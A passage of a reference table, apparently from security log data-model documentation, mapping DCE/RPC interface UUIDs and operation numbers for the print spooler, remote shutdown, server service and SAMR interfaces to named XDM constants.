76f03f96-cdfd-44fc-a22c-64950a001209:72 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_DELETE_JOB_NAMED_PROPERTY

76f03f96-cdfd-44fc-a22c-64950a001209:73 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_ENUM_JOB_NAMED_PROPERTIES

76f03f96-cdfd-44fc-a22c-64950a001209:74 XDM_CONST.DCERPC_OPERATION_RPC_ASYNC_LOG_JOB_INFO_FOR_BRANCH_OFFICE

894de0c0-0d55-11d3-a322-00c04fa321a1:0 XDM_CONST.DCERPC_OPERATION_BASE_INITIATE_SHUTDOWN

894de0c0-0d55-11d3-a322-00c04fa321a1:1 XDM_CONST.DCERPC_OPERATION_BASE_ABORT_SHUTDOWN
 Original Mapped Description

894de0c0-0d55-11d3-a322-00c04fa321a1:2 XDM_CONST.DCERPC_OPERATION_BASE_INITIATE_SHUTDOWN_EX

d95afe70-a6d5-4259-822e-2c84da1ddb0d:0 XDM_CONST.DCERPC_OPERATION_WSDR_INITIATE_SHUTDOWN

d95afe70-a6d5-4259-822e-2c84da1ddb0d:1 XDM_CONST.DCERPC_OPERATION_WSDR_ABORT_SHUTDOWN

12345678-1234-abcd-ef00-0123456789ab:0 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINTERS

12345678-1234-abcd-ef00-0123456789ab:1 XDM_CONST.DCERPC_OPERATION_RPC_OPEN_PRINTER

12345678-1234-abcd-ef00-0123456789ab:2 XDM_CONST.DCERPC_OPERATION_RPC_SET_JOB

12345678-1234-abcd-ef00-0123456789ab:3 XDM_CONST.DCERPC_OPERATION_RPC_GET_JOB

12345678-1234-abcd-ef00-0123456789ab:4 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_JOBS

12345678-1234-abcd-ef00-0123456789ab:5 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER

12345678-1234-abcd-ef00-0123456789ab:6 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER

12345678-1234-abcd-ef00-0123456789ab:7 XDM_CONST.DCERPC_OPERATION_RPC_SET_PRINTER

12345678-1234-abcd-ef00-0123456789ab:8 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER

12345678-1234-abcd-ef00-0123456789ab:9 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER_DRIVER

12345678-1234-abcd-ef00-0123456789ab:10 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINTER_DRIVERS

12345678-1234-abcd-ef00-0123456789ab:11 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DRIVER

12345678-1234-abcd-ef00-0123456789ab:12 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DRIVER_DIRECTORY

12345678-1234-abcd-ef00-0123456789ab:13 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_DRIVER

12345678-1234-abcd-ef00-0123456789ab:14 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINT_PROCESSOR

12345678-1234-abcd-ef00-0123456789ab:15 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINT_PROCESSORS

12345678-1234-abcd-ef00-0123456789ab:16 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINT_PROCESSOR_DIRECTORY

12345678-1234-abcd-ef00-0123456789ab:17 XDM_CONST.DCERPC_OPERATION_RPC_START_DOC_PRINTER

12345678-1234-abcd-ef00-0123456789ab:18 XDM_CONST.DCERPC_OPERATION_RPC_START_PAGE_PRINTER

12345678-1234-abcd-ef00-0123456789ab:19 XDM_CONST.DCERPC_OPERATION_RPC_WRITE_PRINTER

12345678-1234-abcd-ef00-0123456789ab:20 XDM_CONST.DCERPC_OPERATION_RPC_END_PAGE_PRINTER

12345678-1234-abcd-ef00-0123456789ab:21 XDM_CONST.DCERPC_OPERATION_RPC_ABORT_PRINTER

12345678-1234-abcd-ef00-0123456789ab:22 XDM_CONST.DCERPC_OPERATION_RPC_READ_PRINTER

12345678-1234-abcd-ef00-0123456789ab:23 XDM_CONST.DCERPC_OPERATION_RPC_END_DOC_PRINTER

12345678-1234-abcd-ef00-0123456789ab:24 XDM_CONST.DCERPC_OPERATION_RPC_ADD_JOB

12345678-1234-abcd-ef00-0123456789ab:25 XDM_CONST.DCERPC_OPERATION_RPC_SCHEDULE_JOB

12345678-1234-abcd-ef00-0123456789ab:26 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DATA

12345678-1234-abcd-ef00-0123456789ab:27 XDM_CONST.DCERPC_OPERATION_RPC_SET_PRINTER_DATA

12345678-1234-abcd-ef00-0123456789ab:28 XDM_CONST.DCERPC_OPERATION_RPC_WAIT_FOR_PRINTER_CHANGE

12345678-1234-abcd-ef00-0123456789ab:29 XDM_CONST.DCERPC_OPERATION_RPC_CLOSE_PRINTER

12345678-1234-abcd-ef00-0123456789ab:30 XDM_CONST.DCERPC_OPERATION_RPC_ADD_FORM

12345678-1234-abcd-ef00-0123456789ab:31 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_FORM

12345678-1234-abcd-ef00-0123456789ab:32 XDM_CONST.DCERPC_OPERATION_RPC_GET_FORM

12345678-1234-abcd-ef00-0123456789ab:33 XDM_CONST.DCERPC_OPERATION_RPC_SET_FORM

12345678-1234-abcd-ef00-0123456789ab:34 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_FORMS

12345678-1234-abcd-ef00-0123456789ab:35 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PORTS

12345678-1234-abcd-ef00-0123456789ab:36 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_MONITORS

12345678-1234-abcd-ef00-0123456789ab:37 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PORT
 Original Mapped Description

12345678-1234-abcd-ef00-0123456789ab:38 XDM_CONST.DCERPC_OPERATION_RPC_CONFIGURE_PORT

12345678-1234-abcd-ef00-0123456789ab:39 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PORT

12345678-1234-abcd-ef00-0123456789ab:40 XDM_CONST.DCERPC_OPERATION_RPC_CREATE_PRINTER_IC

12345678-1234-abcd-ef00-0123456789ab:41 XDM_CONST.DCERPC_OPERATION_RPC_PLAY_GDI_SCRIPT_ON_PRINTER_IC

12345678-1234-abcd-ef00-0123456789ab:42 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_IC

12345678-1234-abcd-ef00-0123456789ab:43 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER_CONNECTION

12345678-1234-abcd-ef00-0123456789ab:44 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_CONNECTION

12345678-1234-abcd-ef00-0123456789ab:45 XDM_CONST.DCERPC_OPERATION_RPC_PRINTER_MESSAGE_BOX

12345678-1234-abcd-ef00-0123456789ab:46 XDM_CONST.DCERPC_OPERATION_RPC_ADD_MONITOR

12345678-1234-abcd-ef00-0123456789ab:47 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_MONITOR

12345678-1234-abcd-ef00-0123456789ab:48 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINT_PROCESSOR

12345678-1234-abcd-ef00-0123456789ab:49 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINT_PROVIDOR

12345678-1234-abcd-ef00-0123456789ab:50 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINT_PROVIDOR

12345678-1234-abcd-ef00-0123456789ab:51 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINT_PROCESSOR_DATATYPES

12345678-1234-abcd-ef00-0123456789ab:52 XDM_CONST.DCERPC_OPERATION_RPC_RESET_PRINTER

12345678-1234-abcd-ef00-0123456789ab:53 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DRIVER2

12345678-1234-abcd-ef00-0123456789ab:54 XDM_CONST.DCERPC_OPERATION_RPC_CLIENT_FIND_FIRST_PRINTER_CHANGE_NOTIFICATION

12345678-1234-abcd-ef00-0123456789ab:55 XDM_CONST.DCERPC_OPERATION_RPC_FIND_NEXT_PRINTER_CHANGE_NOTIFICATION

12345678-1234-abcd-ef00-0123456789ab:56 XDM_CONST.DCERPC_OPERATION_RPC_FIND_CLOSE_PRINTER_CHANGE_NOTIFICATION

12345678-1234-abcd-ef00-0123456789ab:57 XDM_CONST.DCERPC_OPERATION_RPC_ROUTER_FIND_FIRST_PRINTER_CHANGE_NOTIFICATION_OLD

12345678-1234-abcd-ef00-0123456789ab:58 XDM_CONST.DCERPC_OPERATION_RPC_REPLY_OPEN_PRINTER

12345678-1234-abcd-ef00-0123456789ab:59 XDM_CONST.DCERPC_OPERATION_RPC_ROUTER_REPLY_PRINTER

12345678-1234-abcd-ef00-0123456789ab:60 XDM_CONST.DCERPC_OPERATION_RPC_REPLY_CLOSE_PRINTER

12345678-1234-abcd-ef00-0123456789ab:61 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PORT_EX

12345678-1234-abcd-ef00-0123456789ab:62 XDM_CONST.DCERPC_OPERATION_RPC_REMOTE_FIND_FIRST_PRINTER_CHANGE_NOTIFICATION

12345678-1234-abcd-ef00-0123456789ab:63 XDM_CONST.DCERPC_OPERATION_RPC_SPOOLER_INIT

12345678-1234-abcd-ef00-0123456789ab:64 XDM_CONST.DCERPC_OPERATION_RPC_RESET_PRINTER_EX

12345678-1234-abcd-ef00-0123456789ab:65 XDM_CONST.DCERPC_OPERATION_RPC_REMOTE_FIND_FIRST_PRINTER_CHANGE_NOTIFICATION_EX

12345678-1234-abcd-ef00-0123456789ab:66 XDM_CONST.DCERPC_OPERATION_RPC_ROUTER_REPLY_PRINTER_EX

12345678-1234-abcd-ef00-0123456789ab:67 XDM_CONST.DCERPC_OPERATION_RPC_ROUTER_REFRESH_PRINTER_CHANGE_NOTIFICATION

12345678-1234-abcd-ef00-0123456789ab:68 XDM_CONST.DCERPC_OPERATION_RPC_SET_ALLOC_FAIL_COUNT

12345678-1234-abcd-ef00-0123456789ab:69 XDM_CONST.DCERPC_OPERATION_RPC_SPL_OPEN_PRINTER

12345678-1234-abcd-ef00-0123456789ab:70 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER_EX

12345678-1234-abcd-ef00-0123456789ab:71 XDM_CONST.DCERPC_OPERATION_RPC_SET_PORT

12345678-1234-abcd-ef00-0123456789ab:72 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINTER_DATA

12345678-1234-abcd-ef00-0123456789ab:73 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_DATA

12345678-1234-abcd-ef00-0123456789ab:74 XDM_CONST.DCERPC_OPERATION_RPC_CLUSTER_SPL_OPEN

12345678-1234-abcd-ef00-0123456789ab:75 XDM_CONST.DCERPC_OPERATION_RPC_CLUSTER_SPL_CLOSE

12345678-1234-abcd-ef00-0123456789ab:76 XDM_CONST.DCERPC_OPERATION_RPC_CLUSTER_SPL_IS_ALIVE

12345678-1234-abcd-ef00-0123456789ab:77 XDM_CONST.DCERPC_OPERATION_RPC_SET_PRINTER_DATA_EX

12345678-1234-abcd-ef00-0123456789ab:78 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DATA_EX
 Original Mapped Description

12345678-1234-abcd-ef00-0123456789ab:79 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINTER_DATA_EX

12345678-1234-abcd-ef00-0123456789ab:80 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PRINTER_KEY

12345678-1234-abcd-ef00-0123456789ab:81 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_DATA_EX

12345678-1234-abcd-ef00-0123456789ab:82 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_KEY

12345678-1234-abcd-ef00-0123456789ab:83 XDM_CONST.DCERPC_OPERATION_RPC_SEEK_PRINTER

12345678-1234-abcd-ef00-0123456789ab:84 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_DRIVER_EX

12345678-1234-abcd-ef00-0123456789ab:85 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PER_MACHINE_CONNECTION

12345678-1234-abcd-ef00-0123456789ab:86 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PER_MACHINE_CONNECTION

12345678-1234-abcd-ef00-0123456789ab:87 XDM_CONST.DCERPC_OPERATION_RPC_ENUM_PER_MACHINE_CONNECTIONS

12345678-1234-abcd-ef00-0123456789ab:88 XDM_CONST.DCERPC_OPERATION_RPC_XCV_DATA

12345678-1234-abcd-ef00-0123456789ab:89 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER_DRIVER_EX

12345678-1234-abcd-ef00-0123456789ab:90 XDM_CONST.DCERPC_OPERATION_RPC_SPL_OPEN_PRINTER

12345678-1234-abcd-ef00-0123456789ab:91 XDM_CONST.DCERPC_OPERATION_RPC_GET_SPOOL_FILE_INFO

12345678-1234-abcd-ef00-0123456789ab:92 XDM_CONST.DCERPC_OPERATION_RPC_COMMIT_SPOOL_DATA

12345678-1234-abcd-ef00-0123456789ab:93 XDM_CONST.DCERPC_OPERATION_RPC_CLOSE_SPOOL_FILE_HANDLE

12345678-1234-abcd-ef00-0123456789ab:94 XDM_CONST.DCERPC_OPERATION_RPC_FLUSH_PRINTER

12345678-1234-abcd-ef00-0123456789ab:95 XDM_CONST.DCERPC_OPERATION_RPC_SEND_RECV_BIDI_DATA

12345678-1234-abcd-ef00-0123456789ab:96 XDM_CONST.DCERPC_OPERATION_RPC_ADD_DRIVER_CATALOG

12345678-1234-abcd-ef00-0123456789ab:97 XDM_CONST.DCERPC_OPERATION_RPC_ADD_PRINTER_CONNECTION2

12345678-1234-abcd-ef00-0123456789ab:98 XDM_CONST.DCERPC_OPERATION_RPC_DELETE_PRINTER_CONNECTION2

12345678-1234-abcd-ef00-0123456789ab:99 XDM_CONST.DCERPC_OPERATION_RPC_INSTALL_PRINTER_DRIVER_FROM_PACKAGE

12345678-1234-abcd-ef00-0123456789ab:100 XDM_CONST.DCERPC_OPERATION_RPC_UPLOAD_PRINTER_DRIVER_PACKAGE

12345678-1234-abcd-ef00-0123456789ab:101 XDM_CONST.DCERPC_OPERATION_RPC_GET_CORE_PRINTER_DRIVERS

12345678-1234-abcd-ef00-0123456789ab:102 XDM_CONST.DCERPC_OPERATION_RPC_CORE_PRINTER_DRIVER_INSTALLED

12345678-1234-abcd-ef00-0123456789ab:103 XDM_CONST.DCERPC_OPERATION_RPC_GET_PRINTER_DRIVER_PACKAGE_PATH

12345678-1234-abcd-ef00-0123456789ab:104 XDM_CONST.DCERPC_OPERATION_RPC_REPORT_JOB_PROCESSING_PROGRESS

4b324fc8-1670-01d3-1278-5a47bf6ee188:0 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_ENUM

4b324fc8-1670-01d3-1278-5a47bf6ee188:1 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_GET_INFO

4b324fc8-1670-01d3-1278-5a47bf6ee188:2 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_CONTROL

4b324fc8-1670-01d3-1278-5a47bf6ee188:3 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_Q_ENUM

4b324fc8-1670-01d3-1278-5a47bf6ee188:4 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_Q_GET_INFO

4b324fc8-1670-01d3-1278-5a47bf6ee188:5 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_Q_SET_INFO

4b324fc8-1670-01d3-1278-5a47bf6ee188:6 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_Q_PURGE

4b324fc8-1670-01d3-1278-5a47bf6ee188:7 XDM_CONST.DCERPC_OPERATION_NETR_CHAR_DEV_Q_PURGE_SELF

4b324fc8-1670-01d3-1278-5a47bf6ee188:8 XDM_CONST.DCERPC_OPERATION_NETR_CONNECTION_ENUM

4b324fc8-1670-01d3-1278-5a47bf6ee188:9 XDM_CONST.DCERPC_OPERATION_NETR_FILE_ENUM

4b324fc8-1670-01d3-1278-5a47bf6ee188:10 XDM_CONST.DCERPC_OPERATION_NETR_FILE_GET_INFO

4b324fc8-1670-01d3-1278-5a47bf6ee188:11 XDM_CONST.DCERPC_OPERATION_NETR_FILE_CLOSE

4b324fc8-1670-01d3-1278-5a47bf6ee188:12 XDM_CONST.DCERPC_OPERATION_NETR_SESSION_ENUM

4b324fc8-1670-01d3-1278-5a47bf6ee188:13 XDM_CONST.DCERPC_OPERATION_NETR_SESSION_DEL

4b324fc8-1670-01d3-1278-5a47bf6ee188:14 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_ADD
 Original Mapped Description

4b324fc8-1670-01d3-1278-5a47bf6ee188:15 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_ENUM

4b324fc8-1670-01d3-1278-5a47bf6ee188:16 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_GET_INFO

4b324fc8-1670-01d3-1278-5a47bf6ee188:17 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_SET_INFO

4b324fc8-1670-01d3-1278-5a47bf6ee188:18 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_DEL

4b324fc8-1670-01d3-1278-5a47bf6ee188:19 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_DEL_STICKY

4b324fc8-1670-01d3-1278-5a47bf6ee188:20 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_CHECK

4b324fc8-1670-01d3-1278-5a47bf6ee188:21 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_GET_INFO

4b324fc8-1670-01d3-1278-5a47bf6ee188:22 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_SET_INFO

4b324fc8-1670-01d3-1278-5a47bf6ee188:23 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_DISK_ENUM

4b324fc8-1670-01d3-1278-5a47bf6ee188:24 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_STATISTICS_GET

4b324fc8-1670-01d3-1278-5a47bf6ee188:25 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRANSPORT_ADD

4b324fc8-1670-01d3-1278-5a47bf6ee188:26 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRANSPORT_ENUM

4b324fc8-1670-01d3-1278-5a47bf6ee188:27 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRANSPORT_DEL

4b324fc8-1670-01d3-1278-5a47bf6ee188:28 XDM_CONST.DCERPC_OPERATION_NETR_REMOTE_TOD

4b324fc8-1670-01d3-1278-5a47bf6ee188:29 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_SET_SERVICE_BITS

4b324fc8-1670-01d3-1278-5a47bf6ee188:30 XDM_CONST.DCERPC_OPERATION_NETPR_PATH_TYPE

4b324fc8-1670-01d3-1278-5a47bf6ee188:31 XDM_CONST.DCERPC_OPERATION_NETPR_PATH_CANONICALIZE

4b324fc8-1670-01d3-1278-5a47bf6ee188:32 XDM_CONST.DCERPC_OPERATION_NETPR_PATH_COMPARE

4b324fc8-1670-01d3-1278-5a47bf6ee188:33 XDM_CONST.DCERPC_OPERATION_NETPR_NAME_VALIDATE

4b324fc8-1670-01d3-1278-5a47bf6ee188:34 XDM_CONST.DCERPC_OPERATION_NETPR_NAME_CANONICALIZE

4b324fc8-1670-01d3-1278-5a47bf6ee188:35 XDM_CONST.DCERPC_OPERATION_NETPR_NAME_COMPARE

4b324fc8-1670-01d3-1278-5a47bf6ee188:36 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_ENUM_STICKY

4b324fc8-1670-01d3-1278-5a47bf6ee188:37 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_DEL_START

4b324fc8-1670-01d3-1278-5a47bf6ee188:38 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_DEL_COMMIT

4b324fc8-1670-01d3-1278-5a47bf6ee188:39 XDM_CONST.DCERPC_OPERATION_NETRP_GET_FILE_SECURITY

4b324fc8-1670-01d3-1278-5a47bf6ee188:40 XDM_CONST.DCERPC_OPERATION_NETRP_SET_FILE_SECURITY

4b324fc8-1670-01d3-1278-5a47bf6ee188:41 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRANSPORT_ADD_EX

4b324fc8-1670-01d3-1278-5a47bf6ee188:42 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_SET_SERVICE_BITS_EX

4b324fc8-1670-01d3-1278-5a47bf6ee188:43 XDM_CONST.DCERPC_OPERATION_NETR_DFS_GET_VERSION

4b324fc8-1670-01d3-1278-5a47bf6ee188:44 XDM_CONST.DCERPC_OPERATION_NETR_DFS_CREATE_LOCAL_PARTITION

4b324fc8-1670-01d3-1278-5a47bf6ee188:45 XDM_CONST.DCERPC_OPERATION_NETR_DFS_DELETE_LOCAL_PARTITION

4b324fc8-1670-01d3-1278-5a47bf6ee188:46 XDM_CONST.DCERPC_OPERATION_NETR_DFS_SET_LOCAL_VOLUME_STATE

4b324fc8-1670-01d3-1278-5a47bf6ee188:47 XDM_CONST.DCERPC_OPERATION_NETR_DFS_SET_SERVER_INFO

4b324fc8-1670-01d3-1278-5a47bf6ee188:48 XDM_CONST.DCERPC_OPERATION_NETR_DFS_CREATE_EXIT_POINT

4b324fc8-1670-01d3-1278-5a47bf6ee188:49 XDM_CONST.DCERPC_OPERATION_NETR_DFS_DELETE_EXIT_POINT

4b324fc8-1670-01d3-1278-5a47bf6ee188:50 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MODIFY_PREFIX

4b324fc8-1670-01d3-1278-5a47bf6ee188:51 XDM_CONST.DCERPC_OPERATION_NETR_DFS_FIX_LOCAL_VOLUME

4b324fc8-1670-01d3-1278-5a47bf6ee188:52 XDM_CONST.DCERPC_OPERATION_NETR_DFS_MANAGER_REPORT_SITE_INFO

4b324fc8-1670-01d3-1278-5a47bf6ee188:53 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_TRANSPORT_DEL_EX

4b324fc8-1670-01d3-1278-5a47bf6ee188:55 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_ALIAS_ENUM

4b324fc8-1670-01d3-1278-5a47bf6ee188:56 XDM_CONST.DCERPC_OPERATION_NETR_SERVER_ALIAS_DEL
 Original Mapped Description

4b324fc8-1670-01d3-1278-5a47bf6ee188:57 XDM_CONST.DCERPC_OPERATION_NETR_SHARE_DEL_EX

12345778-1234-abcd-ef00-0123456789ac:0 XDM_CONST.DCERPC_OPERATION_SAMR_CONNECT

12345778-1234-abcd-ef00-0123456789ac:1 XDM_CONST.DCERPC_OPERATION_SAMR_CLOSE_HANDLE

12345778-1234-abcd-ef00-0123456789ac:2 XDM_CONST.DCERPC_OPERATION_SAMR_SET_SECURITY_OBJECT

12345778-1234-abcd-ef00-0123456789ac:3 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_SECURITY_OBJECT

12345778-1234-abcd-ef00-0123456789ac:4 XDM_CONST.DCERPC_OPERATION_SAMR_SHUTDOWN_SAM_SERVER

12345778-1234-abcd-ef00-0123456789ac:5 XDM_CONST.DCERPC_OPERATION_SAMR_LOOKUP_DOMAIN_IN_SAM_SERVER

12345778-1234-abcd-ef00-0123456789ac:6 XDM_CONST.DCERPC_OPERATION_SAMR_ENUMERATE_DOMAINS_IN_SAM_SERVER

12345778-1234-abcd-ef00-0123456789ac:7 XDM_CONST.DCERPC_OPERATION_SAMR_OPEN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:8 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:9 XDM_CONST.DCERPC_OPERATION_SAMR_SET_INFORMATION_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:10 XDM_CONST.DCERPC_OPERATION_SAMR_CREATE_GROUP_IN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:11 XDM_CONST.DCERPC_OPERATION_SAMR_ENUMERATE_GROUPS_IN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:12 XDM_CONST.DCERPC_OPERATION_SAMR_CREATE_USER_IN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:13 XDM_CONST.DCERPC_OPERATION_SAMR_ENUMERATE_USERS_IN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:14 XDM_CONST.DCERPC_OPERATION_SAMR_CREATE_ALIAS_IN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:15 XDM_CONST.DCERPC_OPERATION_SAMR_ENUMERATE_ALIASES_IN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:16 XDM_CONST.DCERPC_OPERATION_SAMR_GET_ALIAS_MEMBERSHIP

12345778-1234-abcd-ef00-0123456789ac:17 XDM_CONST.DCERPC_OPERATION_SAMR_LOOKUP_NAMES_IN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:18 XDM_CONST.DCERPC_OPERATION_SAMR_LOOKUP_IDS_IN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:19 XDM_CONST.DCERPC_OPERATION_SAMR_OPEN_GROUP

12345778-1234-abcd-ef00-0123456789ac:20 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_GROUP

12345778-1234-abcd-ef00-0123456789ac:21 XDM_CONST.DCERPC_OPERATION_SAMR_SET_INFORMATION_GROUP

12345778-1234-abcd-ef00-0123456789ac:22 XDM_CONST.DCERPC_OPERATION_SAMR_ADD_MEMBER_TO_GROUP

12345778-1234-abcd-ef00-0123456789ac:23 XDM_CONST.DCERPC_OPERATION_SAMR_DELETE_GROUP

12345778-1234-abcd-ef00-0123456789ac:24 XDM_CONST.DCERPC_OPERATION_SAMR_REMOVE_MEMBER_FROM_GROUP

12345778-1234-abcd-ef00-0123456789ac:25 XDM_CONST.DCERPC_OPERATION_SAMR_GET_MEMBERS_IN_GROUP

12345778-1234-abcd-ef00-0123456789ac:26 XDM_CONST.DCERPC_OPERATION_SAMR_SET_MEMBER_ATTRIBUTES_OF_GROUP

12345778-1234-abcd-ef00-0123456789ac:27 XDM_CONST.DCERPC_OPERATION_SAMR_OPEN_ALIAS

12345778-1234-abcd-ef00-0123456789ac:28 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_ALIAS

12345778-1234-abcd-ef00-0123456789ac:29 XDM_CONST.DCERPC_OPERATION_SAMR_SET_INFORMATION_ALIAS

12345778-1234-abcd-ef00-0123456789ac:30 XDM_CONST.DCERPC_OPERATION_SAMR_DELETE_ALIAS

12345778-1234-abcd-ef00-0123456789ac:31 XDM_CONST.DCERPC_OPERATION_SAMR_ADD_MEMBER_TO_ALIAS

12345778-1234-abcd-ef00-0123456789ac:32 XDM_CONST.DCERPC_OPERATION_SAMR_REMOVE_MEMBER_FROM_ALIAS

12345778-1234-abcd-ef00-0123456789ac:33 XDM_CONST.DCERPC_OPERATION_SAMR_GET_MEMBERS_IN_ALIAS

12345778-1234-abcd-ef00-0123456789ac:34 XDM_CONST.DCERPC_OPERATION_SAMR_OPEN_USER

12345778-1234-abcd-ef00-0123456789ac:35 XDM_CONST.DCERPC_OPERATION_SAMR_DELETE_USER

12345778-1234-abcd-ef00-0123456789ac:36 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_USER

12345778-1234-abcd-ef00-0123456789ac:37 XDM_CONST.DCERPC_OPERATION_SAMR_SET_INFORMATION_USER

12345778-1234-abcd-ef00-0123456789ac:38 XDM_CONST.DCERPC_OPERATION_SAMR_CHANGE_PASSWORD_USER

12345778-1234-abcd-ef00-0123456789ac:39 XDM_CONST.DCERPC_OPERATION_SAMR_GET_GROUPS_FOR_USER
 Original Mapped Description

12345778-1234-abcd-ef00-0123456789ac:40 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_DISPLAY_INFORMATION

12345778-1234-abcd-ef00-0123456789ac:41 XDM_CONST.DCERPC_OPERATION_SAMR_GET_DISPLAY_ENUMERATION_INDEX

12345778-1234-abcd-ef00-0123456789ac:42 XDM_CONST.DCERPC_OPERATION_SAMR_TEST_PRIVATE_FUNCTIONS_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:43 XDM_CONST.DCERPC_OPERATION_SAMR_TEST_PRIVATE_FUNCTIONS_USER

12345778-1234-abcd-ef00-0123456789ac:44 XDM_CONST.DCERPC_OPERATION_SAMR_GET_USER_DOMAIN_PASSWORD_INFORMATION

12345778-1234-abcd-ef00-0123456789ac:45 XDM_CONST.DCERPC_OPERATION_SAMR_REMOVE_MEMBER_FROM_FOREIGN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:46 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_DOMAIN2

12345778-1234-abcd-ef00-0123456789ac:47 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_INFORMATION_USER2

12345778-1234-abcd-ef00-0123456789ac:48 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_DISPLAY_INFORMATION2

12345778-1234-abcd-ef00-0123456789ac:49 XDM_CONST.DCERPC_OPERATION_SAMR_GET_DISPLAY_ENUMERATION_INDEX2

12345778-1234-abcd-ef00-0123456789ac:50 XDM_CONST.DCERPC_OPERATION_SAMR_CREATE_USER2_IN_DOMAIN

12345778-1234-abcd-ef00-0123456789ac:51 XDM_CONST.DCERPC_OPERATION_SAMR_QUERY_DISPLAY_INFORMATION3

12345778-1234-abcd-ef00-0123456789ac:52 XDM_CONST.DCERPC_OPERATION_SAMR_ADD_MULTIPLE_MEMBERS_TO_ALIAS

12345778-1234-abcd-ef00-0123456789ac:53 XDM_CONST.DCERPC_OPERATION_SAMR_REMOVE_MULTIPLE_MEMBERS_FROM_ALIAS

